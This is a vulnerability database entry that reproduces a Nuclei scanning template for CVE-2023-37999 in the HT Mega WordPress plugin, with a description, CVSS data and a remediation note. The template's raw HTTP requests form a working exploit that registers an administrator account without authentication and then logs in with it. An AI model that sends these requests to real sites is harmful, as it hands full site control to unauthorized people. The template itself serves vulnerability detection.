Lucene search
K

HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation

🗓️ 11 Jul 2026 02:59:56Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

HT Mega for Elementor up to 2.2.0 allows unauthenticated privilege escalation to create admin accounts.

Related
Refs
Code
id: CVE-2023-37999

info:
  name: HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation
  author: daffainfo
  severity: critical
  description: |
    The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
  impact: |
    Attackers can escalate privileges, gaining unauthorized access to restricted functionalities or data.
  remediation: |
    Update to the latest version of HT Mega to address the privilege management issue.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor/ht-mega-absolute-addons-for-elementor-220-missing-authorization-to-privilege-escalation
    - https://plugins.trac.wordpress.org/changeset/2934204/ht-mega-for-elementor/trunk/includes/helper-function.php?contextall=1&old=2899662&old_path=%2Fht-mega-for-elementor%2Ftrunk%2Fincludes%2Fhelper-function.php
    - https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37999
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37999
    cwe-id: CWE-269
    epss-score: 0.03043
    epss-percentile: 0.85965
    cpe: cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: hasthemes
    product: ht_mega
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ht-mega-for-elementor"
  tags: cve,cve2023,wordpress,wp,wp-plugin,hasthemes,ht_mega,vkev,ht-mega-for-elementor

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        reg_name={{username}}&reg_password={{password}}&reg_email={{email}}&reg_role=administrator

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Successfully Register")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Login

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(header,"wordpress_logged_in", "/wp-admin")'
          - 'status_code == 302'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + ". Password: "+ password'
# digest: 4b0a00483046022100e69ba3604d5f5296ea22aaadc1d683b85cede0ab8277c8b82a1ddfd7681221d6022100d121f9e64c967354c4488281c9542ee5560de9047be161046cdf01337ac94a25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8
EPSS0.03043
SSVC
11